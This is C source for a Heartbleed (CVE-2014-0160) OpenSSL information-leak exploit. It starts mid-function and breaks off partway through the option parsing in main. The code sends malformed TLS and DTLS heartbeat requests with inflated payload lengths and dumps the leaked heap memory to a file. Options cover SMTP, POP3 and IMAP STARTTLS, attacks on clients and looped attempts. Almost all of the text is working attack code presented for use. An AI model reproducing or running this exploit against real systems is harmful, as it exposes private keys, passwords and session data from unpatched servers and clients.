tls_bind(int sd){\r\n\tint bytes;\r\n connection *c;\r\n char* buf;\r\n\tbuf = malloc(4096);\r\n if(buf==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n 
}\r\n\tmemset(buf,0,4096);\r\n\tc = malloc(sizeof(connection));\r\n\tif(c==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tc->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(SSLv23_server_method());\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n\tSSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\r\n\tSSL_CTX_SRP_CTX_init(c->sslContext);\r\n\tSSL_CTX_use_certificate_file(c->sslContext, "./server.crt", SSL_FILETYPE_PEM);\r\n\tSSL_CTX_use_PrivateKey_file(c->sslContext, "./server.key", SSL_FILETYPE_PEM); \r\n\tif(!SSL_CTX_check_private_key(c->sslContext)){\r\n\t\tprintf("[!] FATAL: private key does not match the certificate public key\\n");\r\n\t\texit(0);\r\n\t}\r\n\tc->sslHandle = SSL_new(c->sslContext);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(!SSL_set_fd(c->sslHandle,c->socket))\r\n ERR_print_errors_fp(stderr);\r\n int rc = SSL_accept(c->sslHandle);\r\n\tprintf ("[ SSL connection using %s\\n", SSL_get_cipher (c->sslHandle));\r\n\tbytes = SSL_read(c->sslHandle, buf, 4095);\r\n\tprintf("[ recieved: %d bytes - showing output\\n%s\\n[\\n",bytes,buf);\r\n\tif(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf("[ warning: heartbeat extension is unsupported (try anyway)\\n");\r\n }\r\n return c;\r\n}\r\n\r\nint pre_cmd(int sd,int precmd,int verbose){\r\n\t/* this function can be used to send commands to a plain-text\r\n\tservice or client before heartbleed exploit attempt. e.g. 
STARTTLS */\r\n\tint rc, go = 0;\r\n\tchar* buffer;\r\n\tchar* line1;\r\n\tchar* line2; \r\n\tswitch(precmd){\r\n\t\tcase 0:\r\n\t\t\tline1 = "EHLO test\\n";\r\n\t\t\tline2 = "STARTTLS\\n";\r\n\t\t\tbreak;\r\n\t\tcase 1:\r\n\t\t\tline1 = "CAPA\\n";\r\n\t\t\tline2 = "STLS\\n";\r\n\t\t\tbreak;\r\n\t\tcase 2:\r\n\t\t\tline1 = "a001 CAPB\\n";\r\n\t\t\tline2 = "a002 STARTTLS\\n";\r\n\t\t\tbreak;\r\n\t\tdefault:\r\n\t\t\tgo = 1;\r\n\t\t\tbreak;\r\n\t}\r\n\tif(go==0){\r\n\t\tbuffer = malloc(2049);\r\n\t if(buffer==NULL){\r\n \tprintf("[ error in malloc()\\n");\r\n \texit(0);\r\n\t }\r\n\t\tmemset(buffer,0,2049);\r\n\t\trc = read(sd,buffer,2048);\r\n\t\tprintf("[ banner: %s",buffer);\r\n\t\tsend(sd,line1,strlen(line1),0);\r\n\t\tmemset(buffer,0,2049);\r\n\t\trc = read(sd,buffer,2048);\r\n\t\tif(verbose==1){\r\n\t\t\tprintf("%s\\n",buffer);\r\n\t\t}\r\n\t\tsend(sd,line2,strlen(line2),0);\r\n\t\tmemset(buffer,0,2049);\r\n\t\trc = read(sd,buffer,2048);\r\n\t\tif(verbose==1){\r\n\t\t\tprintf("%s\\n",buffer);\r\n\t\t}\r\n\t}\r\n\treturn sd;\r\n}\r\n\r\nvoid* heartbleed(connection *c,unsigned int type){\r\n\tunsigned char *buf, *p;\r\n int ret;\r\n\tbuf = OPENSSL_malloc(1 + 2);\r\n\tif(buf==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tp = buf;\r\n *p++ = TLS1_HB_REQUEST;\r\n\tswitch(type){\r\n\t\tcase 0:\r\n\t\t\ts2n(0x0,p);\r\n\t\t\tbreak;\r\n\t\tcase 1:\r\n\t\t\ts2n(0xffff,p);\r\n\t\t\tbreak;\r\n\t\tdefault:\r\n\t\t\tprintf("[ setting heartbeat payload_length to %u\\n",type);\r\n\t\t\ts2n(type,p);\r\n\t\t\tbreak;\r\n\t}\r\n\tprintf("[ <3 <3 <3 heart bleed <3 <3 <3\\n");\r\n ret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3);\r\n OPENSSL_free(buf);\r\n\treturn c;\r\n}\r\n\r\nvoid* dtlsheartbleed(connection *c,unsigned int type){\r\n\r\n\tunsigned char *buf, *p;\r\n int ret;\r\n\tbuf = OPENSSL_malloc(1 + 2 + 16);\r\n\tmemset(buf, '\\0', sizeof buf);\r\n\tif(buf==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tp = buf;\r\n 
*p++ = TLS1_HB_REQUEST;\r\n\tswitch(type){\r\n\t\tcase 0:\r\n\t\t\ts2n(0x0,p);\r\n\t\t\tbreak;\r\n\t\tcase 1:\r\n//\t\t\ts2n(0xffff,p);\r\n//\t\t\ts2n(0x3feb,p);\r\n\t\t\ts2n(0x0538,p);\r\n\t\t\tbreak;\r\n\t\tdefault:\r\n\t\t\tprintf("[ setting heartbeat payload_length to %u\\n",type);\r\n\t\t\ts2n(type,p);\r\n\t\t\tbreak;\r\n\t}\r\n\ts2n(c->sslHandle->tlsext_hb_seq, p);\r\n\tprintf("[ <3 <3 <3 heart bleed <3 <3 <3\\n");\r\n\r\n ret = dtls1_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3 + 16);\r\n\r\n\tif (ret >= 0)\r\n\t\t{\r\n\t\tif (c->sslHandle->msg_callback)\r\n\t\t\tc->sslHandle->msg_callback(1, c->sslHandle->version, TLS1_RT_HEARTBEAT,\r\n\t\t\t\tbuf, 3 + 16,\r\n\t\t\t\tc->sslHandle, c->sslHandle->msg_callback_arg);\r\n\r\n\t\tdtls1_start_timer(c->sslHandle);\r\n\t\tc->sslHandle->tlsext_hb_pending = 1;\r\n\t\t}\r\n\r\n OPENSSL_free(buf);\r\n\r\n\treturn c;\r\n}\r\n\r\nvoid* sneakyleaky(connection *c,char* filename, int verbose){\r\n\tchar *p;\r\n int ssl_major,ssl_minor,al;\r\n int enc_err,n,i;\r\n SSL3_RECORD *rr;\r\n SSL_SESSION *sess;\r\n\tSSL* s;\r\n unsigned char md[EVP_MAX_MD_SIZE];\r\n short version;\r\n unsigned mac_size, orig_len;\r\n size_t extra;\r\n rr= &(c->sslHandle->s3->rrec);\r\n sess=c->sslHandle->session;\r\n s = c->sslHandle;\r\n if (c->sslHandle->options & SSL_OP_MICROSOFT_BIG_SSLV3_BUFFER)\r\n extra=SSL3_RT_MAX_EXTRA;\r\n else\r\n extra=0;\r\n if ((s->rstate != SSL_ST_READ_BODY) ||\r\n (s->packet_length < SSL3_RT_HEADER_LENGTH)) {\r\n n=ssl3_read_n(s, SSL3_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);\r\n if (n <= 0)\r\n goto apple; \r\n s->rstate=SSL_ST_READ_BODY;\r\n p=s->packet;\r\n rr->type= *(p++);\r\n ssl_major= *(p++);\r\n ssl_minor= *(p++);\r\n version=(ssl_major<<8)|ssl_minor;\r\n n2s(p,rr->length);\r\n\t\t\tif(rr->type==24){\r\n\t\t\t\tprintf("[ heartbeat returned type=%d length=%u\\n",rr->type, rr->length);\r\n\t\t\t\tif(rr->length > 16834){\r\n\t\t\t\t\tprintf("[ error: got a malformed TLS 
length.\\n");\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\telse{\r\n\t\t\t\tprintf("[ incorrect record type=%d length=%u returned\\n",rr->type,rr->length);\r\n\t\t\t\ts->packet_length=0;\r\n\t\t\t\tbadpackets++;\r\n\t\t\t\tif(badpackets > 3){\r\n\t\t\t\t\tprintf("[ error: too many bad packets recieved\\n");\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t\tgoto apple;\r\n\t\t\t}\r\n }\r\n if (rr->length > s->packet_length-SSL3_RT_HEADER_LENGTH){\r\n i=rr->length;\r\n n=ssl3_read_n(s,i,i,1);\r\n if (n <= 0) goto apple; \r\n }\r\n\tprintf("[ decrypting SSL packet\\n");\r\n s->rstate=SSL_ST_READ_HEADER; \r\n rr->input= &(s->packet[SSL3_RT_HEADER_LENGTH]);\r\n rr->data=rr->input;\r\n tls1_enc(s,0);\r\n if((sess != NULL) &&\r\n (s->enc_read_ctx != NULL) &&\r\n (EVP_MD_CTX_md(s->read_hash) != NULL))\r\n {\r\n unsigned char *mac = NULL;\r\n unsigned char mac_tmp[EVP_MAX_MD_SIZE];\r\n mac_size=EVP_MD_CTX_size(s->read_hash);\r\n OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);\r\n orig_len = rr->length+((unsigned int)rr->type>>8);\r\n if(orig_len < mac_size ||\r\n (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&\r\n orig_len < mac_size+1)){\r\n al=SSL_AD_DECODE_ERROR;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);\r\n }\r\n if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){\r\n mac = mac_tmp;\r\n ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);\r\n rr->length -= mac_size;\r\n }\r\n else{\r\n rr->length -= mac_size;\r\n mac = &rr->data[rr->length];\r\n }\r\n i = tls1_mac(s,md,0);\r\n if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)\r\n enc_err = -1;\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra+mac_size)\r\n enc_err = -1;\r\n }\r\n if(enc_err < 0){\r\n al=SSL_AD_BAD_RECORD_MAC;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);\r\n goto apple;\r\n }\r\n if(s->expand != NULL){\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n 
SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n if (!ssl3_do_uncompress(s)) {\r\n al=SSL_AD_DECOMPRESSION_FAILURE;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);\r\n goto apple;\r\n }\r\n }\r\n if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH+extra) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n rr->off=0;\r\n s->packet_length=0;\r\n\tif(first==0){\r\n\t\tuint heartbleed_len = 0;\r\n\t\tchar* fp = s->s3->rrec.data;\r\n\t\t(long)fp++;\r\n\t\tmemcpy(&heartbleed_len,fp,2);\r\n\t\theartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;\r\n\t\tfirst = 2;\r\n\t\tleakbytes = heartbleed_len + 16;\r\n\t\tprintf("[ heartbleed leaked length=%u\\n",heartbleed_len);\r\n\t}\r\n\tif(verbose==1){\r\n\t\t{ unsigned int z; for (z=0; z<rr->length; z++) printf("%02X%c",rr->data[z],((z+1)%16)?' ':'\\n'); }\r\n printf("\\n");\r\n }\r\n\tleakbytes-=rr->length;\r\n\tif(leakbytes > 0){\r\n\t\trepeat = 1;\r\n\t}\r\n\telse{\r\n\t\trepeat = 0;\r\n\t}\r\n\tprintf("[ final record type=%d, length=%u\\n", rr->type, rr->length);\r\n\tint output = s->s3->rrec.length-3;\r\n\tif(output > 0){\r\n\t\tint fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);\r\n\t if(first==2){\r\n\t\t\tfirst--;\r\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n\t\t\t/* first three bytes are resp+len */\r\n\t\t\tprintf("[ wrote %d bytes of heap to file '%s'\\n",s->s3->rrec.length-3,filename);\r\n\t\t}\r\n\t\telse{\r\n\t\t\t/* heap data & 16 bytes padding */\r\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n\t\t\tprintf("[ wrote %d bytes of heap to file '%s'\\n",s->s3->rrec.length,filename);\r\n\t\t}\r\n\t\tclose(fd);\r\n\t}\r\n\telse{\r\n\t\tprintf("[ nothing from the heap to write\\n");\r\n\t}\r\n\treturn;\r\napple:\r\n printf("[ problem handling SSL record packet - wrong type?\\n");\r\n\tbadpackets++;\r\n\tif(badpackets > 3){\r\n\t\tprintf("[ error: too many 
bad packets recieved\\n");\r\n\t\texit(0);\r\n\t}\r\n\treturn;\r\n}\r\n\r\n\r\nvoid* dtlssneakyleaky(connection *c,char* filename, int verbose){\r\n\tchar *p;\r\n int ssl_major,ssl_minor,al;\r\n int enc_err,n,i;\r\n SSL3_RECORD *rr;\r\n SSL_SESSION *sess;\r\n\tSSL* s;\r\n\tDTLS1_BITMAP *bitmap;\r\n\tunsigned int is_next_epoch;\r\n unsigned char md[EVP_MAX_MD_SIZE];\r\n short version;\r\n unsigned int mac_size, orig_len;\r\n\r\n rr= &(c->sslHandle->s3->rrec);\r\n sess=c->sslHandle->session;\r\n s = c->sslHandle;\r\n\r\nagain:\r\n if ((s->rstate != SSL_ST_READ_BODY) ||\r\n (s->packet_length < DTLS1_RT_HEADER_LENGTH)) {\r\n n=ssl3_read_n(s, DTLS1_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);\r\n if (n <= 0)\r\n goto apple; \r\n\r\n s->rstate=SSL_ST_READ_BODY;\r\n p=s->packet;\r\n rr->type= *(p++);\r\n ssl_major= *(p++);\r\n ssl_minor= *(p++);\r\n version=(ssl_major<<8)|ssl_minor;\r\n\t\t\tn2s(p,rr->epoch);\r\n\t\t\tmemcpy(&(s->s3->read_sequence[2]), p, 6);\r\n\t\t\tp+=6;\r\n n2s(p,rr->length);\r\n\t\t\tif(rr->type==24){\r\n\t\t\t\tprintf("[ heartbeat returned type=%d length=%u\\n",rr->type, rr->length);\r\n\t\t\t\tif(rr->length > 16834){\r\n\t\t\t\t\tprintf("[ error: got a malformed TLS length.\\n");\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\telse{\r\n\t\t\t\tprintf("[ incorrect record type=%d length=%u returned\\n",rr->type,rr->length);\r\n\t\t\t\ts->packet_length=0;\r\n\t\t\t\tbadpackets++;\r\n\t\t\t\tif(badpackets > 3){\r\n\t\t\t\t\tprintf("[ error: too many bad packets recieved\\n");\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t\tgoto apple;\r\n\t\t\t}\r\n }\r\n\r\n if (rr->length > s->packet_length-DTLS1_RT_HEADER_LENGTH){\r\n i=rr->length;\r\n n=ssl3_read_n(s,i,i,1);\r\n if (n <= 0) goto apple; \r\n }\r\n\t\tif ( n != i)\r\n\t\t\t{\r\n\t\t\trr->length = 0;\r\n\t\t\ts->packet_length = 0;\r\n\t\t\tgoto again;\r\n\t\t\t}\r\n\tprintf("[ decrypting SSL packet\\n");\r\n s->rstate=SSL_ST_READ_HEADER; \r\n\r\n\tbitmap = dtls1_get_bitmap(s, rr, 
&is_next_epoch);\r\n\tif ( bitmap == NULL)\r\n\t\t{\r\n\t\trr->length = 0;\r\n\t\ts->packet_length = 0;\r\n\t\tgoto again;\r\n\t\t}\r\n\r\n\t\tif (!(s->d1->listen && rr->type == SSL3_RT_HANDSHAKE &&\r\n\t\t *p == SSL3_MT_CLIENT_HELLO) &&\r\n\t\t !dtls1_record_replay_check(s, bitmap))\r\n\t\t\t{\r\n\t\t\trr->length = 0;\r\n\t\t\ts->packet_length=0;\r\n\t\t\tgoto again;\r\n\t\t\t}\r\n\r\n\tif (rr->length == 0) goto again;\r\nif (is_next_epoch)\r\n\t\t{\r\n\t\tif ((SSL_in_init(s) || s->in_handshake) && !s->d1->listen)\r\n\t\t\t{\r\n\t\t\tdtls1_buffer_record(s, &(s->d1->unprocessed_rcds), rr->seq_num);\r\n\t\t\t}\r\n\t\trr->length = 0;\r\n\t\ts->packet_length = 0;\r\n\t\tgoto again;\r\n\t\t}\r\n\r\n\r\n rr->input= &(s->packet[DTLS1_RT_HEADER_LENGTH]);\r\n rr->data=rr->input;\r\n\torig_len=rr->length;\r\n\r\n dtls1_enc(s,0);\r\n\r\n if((sess != NULL) &&\r\n (s->enc_read_ctx != NULL) &&\r\n (EVP_MD_CTX_md(s->read_hash) != NULL))\r\n {\r\n unsigned char *mac = NULL;\r\n unsigned char mac_tmp[EVP_MAX_MD_SIZE];\r\n mac_size=EVP_MD_CTX_size(s->read_hash);\r\n OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);\r\n orig_len = rr->length+((unsigned int)rr->type>>8);\r\n if(orig_len < mac_size ||\r\n (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&\r\n orig_len < mac_size+1)){\r\n al=SSL_AD_DECODE_ERROR;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);\r\n }\r\n if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){\r\n mac = mac_tmp;\r\n ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);\r\n rr->length -= mac_size;\r\n }\r\n else{\r\n rr->length -= mac_size;\r\n mac = &rr->data[rr->length];\r\n }\r\n i = tls1_mac(s,md,0);\r\n\r\n if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)\r\n enc_err = -1;\r\n\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+mac_size)\r\n enc_err = -1;\r\n }\r\n if(enc_err < 0){\r\n al=SSL_AD_BAD_RECORD_MAC;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);\r\n goto 
apple;\r\n }\r\n if(s->expand != NULL){\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n if (!ssl3_do_uncompress(s)) {\r\n al=SSL_AD_DECOMPRESSION_FAILURE;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);\r\n goto apple;\r\n }\r\n }\r\n\r\n if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n rr->off=0;\r\n s->packet_length=0;\r\n\tdtls1_record_bitmap_update(s, &(s->d1->bitmap));\r\n\tif(first==0){\r\n\t\tuint heartbleed_len = 0;\r\n\t\tchar* fp = s->s3->rrec.data;\r\n\t\t(long)fp++;\r\n\t\tmemcpy(&heartbleed_len,fp,2);\r\n\t\theartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;\r\n\t\tfirst = 2;\r\n\t\tleakbytes = heartbleed_len + 16;\r\n\t\tprintf("[ heartbleed leaked length=%u\\n",heartbleed_len);\r\n\t}\r\n\tif(verbose==1){\r\n\t\t{ unsigned int z; for (z=0; z<rr->length; z++) printf("%02X%c",rr->data[z],((z+1)%16)?' 
':'\\n'); }\r\n printf("\\n");\r\n }\r\n\tleakbytes-=rr->length;\r\n\tif(leakbytes > 0){\r\n\t\trepeat = 1;\r\n\t}\r\n\telse{\r\n\t\trepeat = 0;\r\n\t}\r\n\tprintf("[ final record type=%d, length=%u\\n", rr->type, rr->length);\r\n\tint output = s->s3->rrec.length-3;\r\n\tif(output > 0){\r\n\t\tint fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);\r\n\t if(first==2){\r\n\t\t\tfirst--;\r\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n\t\t\t/* first three bytes are resp+len */\r\n\t\t\tprintf("[ wrote %d bytes of heap to file '%s'\\n",s->s3->rrec.length-3,filename);\r\n\t\t}\r\n\t\telse{\r\n\t\t\t/* heap data & 16 bytes padding */\r\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n\t\t\tprintf("[ wrote %d bytes of heap to file '%s'\\n",s->s3->rrec.length,filename);\r\n\t\t}\r\n\t\tclose(fd);\r\n\t}\r\n\telse{\r\n\t\tprintf("[ nothing from the heap to write\\n");\r\n\t}\r\n\r\n\t\t\tdtls1_stop_timer(c->sslHandle);\r\n\t\t\tc->sslHandle->tlsext_hb_seq++;\r\n\t\t\tc->sslHandle->tlsext_hb_pending = 0;\r\n\r\n\treturn;\r\napple:\r\n printf("[ problem handling SSL record packet - wrong type?\\n");\r\n\tbadpackets++;\r\n\tif(badpackets > 3){\r\n\t\tprintf("[ error: too many bad packets recieved\\n");\r\n\t\texit(0);\r\n\t}\r\n\treturn;\r\n}\r\n\r\nstatic DTLS1_BITMAP *\r\ndtls1_get_bitmap(SSL *s, SSL3_RECORD *rr, unsigned int *is_next_epoch)\r\n {\r\n \r\n *is_next_epoch = 0;\r\n\r\n if (rr->epoch == s->d1->r_epoch)\r\n return &s->d1->bitmap;\r\n\r\n else if (rr->epoch == (unsigned long)(s->d1->r_epoch + 1) &&\r\n (rr->type == SSL3_RT_HANDSHAKE ||\r\n rr->type == SSL3_RT_ALERT))\r\n {\r\n *is_next_epoch = 1;\r\n return &s->d1->next_bitmap;\r\n }\r\n\r\n return NULL;\r\n }\r\n\r\nstatic int dtls1_record_replay_check(SSL *s, DTLS1_BITMAP *bitmap)\r\n\t{\r\n\tint cmp;\r\n\tunsigned int shift;\r\n\tconst unsigned char *seq = s->s3->read_sequence;\r\n\r\n\tcmp = satsub64be(seq,bitmap->max_seq_num);\r\n\tif (cmp > 0)\r\n\t\t{\r\n\t\tmemcpy 
(s->s3->rrec.seq_num,seq,8);\r\n\t\treturn 1;\r\n\t\t}\r\n\tshift = -cmp;\r\n\tif (shift >= sizeof(bitmap->map)*8)\r\n\t\treturn 0;\r\n\telse if (bitmap->map & (1UL<<shift))\r\n\t\treturn 0;\r\n\r\n\tmemcpy (s->s3->rrec.seq_num,seq,8);\r\n\treturn 1;\r\n\t}\r\n\r\nint satsub64be(const unsigned char *v1,const unsigned char *v2)\r\n{\tint ret,sat,brw,i;\r\n\r\n\tif (sizeof(long) == 8) do\r\n\t{\tconst union { long one; char little; } is_endian = {1};\r\n\t\tlong l;\r\n\r\n\t\tif (is_endian.little)\t\t\tbreak;\r\n\r\n\t\tif (((size_t)v1|(size_t)v2)&0x7)\tbreak;\r\n\r\n\t\tl = *((long *)v1);\r\n\t\tl -= *((long *)v2);\r\n\t\tif (l>128)\t\treturn 128;\r\n\t\telse if (l<-128)\treturn -128;\r\n\t\telse\t\t\treturn (int)l;\r\n\t} while (0);\r\n\r\n\tret = (int)v1[7]-(int)v2[7];\r\n\tsat = 0;\r\n\tbrw = ret>>8;\r\n\tif (ret & 0x80)\r\n\t{\tfor (i=6;i>=0;i--)\r\n\t\t{\tbrw += (int)v1[i]-(int)v2[i];\r\n\t\t\tsat |= ~brw;\r\n\t\t\tbrw >>= 8;\r\n\t\t}\r\n\t}\r\n\telse\r\n\t{\tfor (i=6;i>=0;i--)\r\n\t\t{\tbrw += (int)v1[i]-(int)v2[i];\r\n\t\t\tsat |= brw;\r\n\t\t\tbrw >>= 8;\r\n\t\t}\r\n\t}\r\n\tbrw <<= 8;\r\n\r\n\tif (sat&0xff)\treturn brw | 0x80;\r\n\telse\t\treturn brw + (ret&0xFF);\r\n}\r\n\r\nstatic int\r\ndtls1_buffer_record(SSL *s, record_pqueue *queue, unsigned char *priority)\r\n\t{\r\n\tDTLS1_RECORD_DATA *rdata;\r\n\tpitem *item;\r\n\r\n\tif (pqueue_size(queue->q) >= 100)\r\n\t\treturn 0;\r\n\t\t\r\n\trdata = OPENSSL_malloc(sizeof(DTLS1_RECORD_DATA));\r\n\titem = pitem_new(priority, rdata);\r\n\tif (rdata == NULL || item == NULL)\r\n\t\t{\r\n\t\tif (rdata != NULL) OPENSSL_free(rdata);\r\n\t\tif (item != NULL) pitem_free(item);\r\n\t\t\r\n\t\tSSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR);\r\n\t\treturn(0);\r\n\t\t}\r\n\t\r\n\trdata->packet = s->packet;\r\n\trdata->packet_length = s->packet_length;\r\n\tmemcpy(&(rdata->rbuf), &(s->s3->rbuf), sizeof(SSL3_BUFFER));\r\n\tmemcpy(&(rdata->rrec), &(s->s3->rrec), sizeof(SSL3_RECORD));\r\n\r\n\titem->data = 
rdata;\r\n\r\n#ifndef OPENSSL_NO_SCTP\r\n\tif (BIO_dgram_is_sctp(SSL_get_rbio(s)) &&\r\n\t (s->state == SSL3_ST_SR_FINISHED_A || s->state == SSL3_ST_CR_FINISHED_A)) {\r\n\t\tBIO_ctrl(SSL_get_rbio(s), BIO_CTRL_DGRAM_SCTP_GET_RCVINFO, sizeof(rdata->recordinfo), &rdata->recordinfo);\r\n\t}\r\n#endif\r\n\r\n\tif (pqueue_insert(queue->q, item) == NULL)\r\n\t\t{\r\n\t\tOPENSSL_free(rdata);\r\n\t\tpitem_free(item);\r\n\t\treturn(0);\r\n\t\t}\r\n\r\n\ts->packet = NULL;\r\n\ts->packet_length = 0;\r\n\tmemset(&(s->s3->rbuf), 0, sizeof(SSL3_BUFFER));\r\n\tmemset(&(s->s3->rrec), 0, sizeof(SSL3_RECORD));\r\n\t\r\n\tif (!ssl3_setup_buffers(s))\r\n\t\t{\r\n\t\tSSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR);\r\n\t\tOPENSSL_free(rdata);\r\n\t\tpitem_free(item);\r\n\t\treturn(0);\r\n\t\t}\r\n\t\r\n\treturn(1);\r\n\t}\r\n\r\n\r\nstatic void dtls1_record_bitmap_update(SSL *s, DTLS1_BITMAP *bitmap)\r\n\t{\r\n\tint cmp;\r\n\tunsigned int shift;\r\n\tconst unsigned char *seq = s->s3->read_sequence;\r\n\r\n\tcmp = satsub64be(seq,bitmap->max_seq_num);\r\n\tif (cmp > 0)\r\n\t\t{\r\n\t\tshift = cmp;\r\n\t\tif (shift < sizeof(bitmap->map)*8)\r\n\t\t\tbitmap->map <<= shift, bitmap->map |= 1UL;\r\n\t\telse\r\n\t\t\tbitmap->map = 1UL;\r\n\t\tmemcpy(bitmap->max_seq_num,seq,8);\r\n\t\t}\r\n\telse\t{\r\n\t\tshift = -cmp;\r\n\t\tif (shift < sizeof(bitmap->map)*8)\r\n\t\t\tbitmap->map |= 1UL<<shift;\r\n\t\t}\r\n\t}\r\n\r\n\r\nvoid usage(){\r\n\tprintf("[\\n");\r\n\tprintf("[ --server|-s <ip/dns> - the server to target\\n");\r\n\tprintf("[ --port|-p <port> - the port to target\\n");\r\n\tprintf("[ --file|-f <filename> - file to write data to\\n");\r\n\tprintf("[ --bind|-b <ip> - bind to ip for exploiting clients\\n");\r\n\tprintf("[ --precmd|-c <n> - send precmd buffer (STARTTLS)\\n");\r\n\tprintf("[\t\t\t 0 = SMTP\\n");\r\n\tprintf("[\t\t\t 1 = POP3\\n");\r\n\tprintf("[\t\t\t 2 = IMAP\\n");\r\n\tprintf("[ --loop|-l\t\t - loop the exploit attempts\\n");\r\n\tprintf("[ --type|-t <n> - select 
exploit to try\\n");\r\n\tprintf("[ 0 = null length\\n");\r\n\tprintf("[\t\t\t 1 = max leak\\n");\r\n\tprintf("[\t\t\t n = heartbeat payload_length\\n");\r\n\tprintf("[ --udp|-u - use dtls/udp\\n");\r\n\tprintf("[\\n");\r\n\tprintf("[ --verbose|-v - output leak to screen\\n");\r\n\tprintf("[ --help|-h - this output\\n");\r\n\tprintf("[\\n");\r\n\texit(0);\r\n}\r\n\r\nint main(int argc, char* argv[]){\r\n\tint ret, port, userc, index;\r\n\tint type = 1, udp = 0, verbose = 0, bind = 0, precmd = 9;\r\n\tint loop = 0;\r\n\tstruct hostent *h;\r\n\tconnection* c;\r\n\tchar *host, *file;\r\n\tint ihost = 0, iport = 0, ifile = 0, itype = 0, iprecmd = 0;\r\n\tprintf("[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\\n");\r\n\tprintf("[ =============================================================\\n");\r\n static struct option options[] = {\r\n \t{"server", 1, 0, 's'},\r\n\t {"port", 1, 0, 'p'},\r\n\t\t{"file", 1, 0, 'f'},\r\n\t\t{"type", 1, 0, 't'},\r\n\t\t{"bind", 1, 0, 'b'},\r\n\t\t{"verbose", 0, 0, 'v'},\r\n\t\t{"precmd", 1, 0, 'c'},\r\n\t\t{"loop", 0, 0, 'l'},\r\n\t\t{"help", 0, 0,'h'},\r\n\t\t{"udp", 0, 0, 'u'}\r\n };\r\n\twhile(userc != -1) {\r\n\t userc = getopt_long(argc,argv,"s:p:f:t:b:c:lvhu",options,&index);\t\r\n \tswitch(userc) {\r\n \t\tcase -1:\r\n\t break;\r\n \t case 's':\r\n\t\t\t\tif(ihost==0){\r\n\t\t\t\t\tihost = 